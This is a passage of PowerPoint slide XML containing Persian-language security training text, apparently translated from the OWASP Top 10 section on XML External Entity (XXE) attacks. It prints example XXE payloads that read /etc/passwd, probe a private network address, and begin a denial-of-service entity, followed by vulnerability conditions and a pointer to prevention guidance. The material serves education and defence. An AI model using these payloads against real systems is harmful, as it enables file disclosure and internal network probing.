                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) عمیق رخ می دهد. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ساده ترین راه این است که فایل </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مخرب را آپلود کنید، اگر مورد قبول باشد:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 1: مهاجم تلاش می کند تا داده ها را از سرور استخراج کند:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>
   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> &lt;!DOCTYPE foo [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>    &lt;!ELEMENT foo ANY &gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>    &lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 2: مهاجم شبکه خصوصی سرور را با تغییر خط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بالا به خط زیر کاوش می کند:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> SYSTEM "https://192.168.1.1/private" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سناریو # 3: یک مهاجم با استفاده از یک فایل بالقوه بی پایان تلاش برای حمله منع سرویس می کند:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربرد آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه های کاربردی و به ویژه سرویس های وب مبتنی بر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> و یا ادغام های پایین دست (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>downstream integrations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>) ممکن است در شرایط زیر برای حمله آسیب پذیر باشند:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> را به طور مستقیم یا آپلودهای </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را قبول می کند، به خصوص از منابع نامشخص، یا داده های غیر قابل اعتماد را به اسناد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> وارد می کند و سپس توسط یک پردازنده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> پردازش می شود.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هر یک از پردازنده های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در برنامه های کاربردی یا وب سرویس های مبتنی بر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>document type definitions (DTDs)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ها را فعال کرده اند. به عنوان مکانیزم دقیق برای غیرفعال کردن پردازش </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DTD، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>بهترین کار استفاده از مرجعی مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> است.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر برنامه کاربردی شما از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای پردازش هویت در خلال امنیت یکپارچه یا اهداف </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>SSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
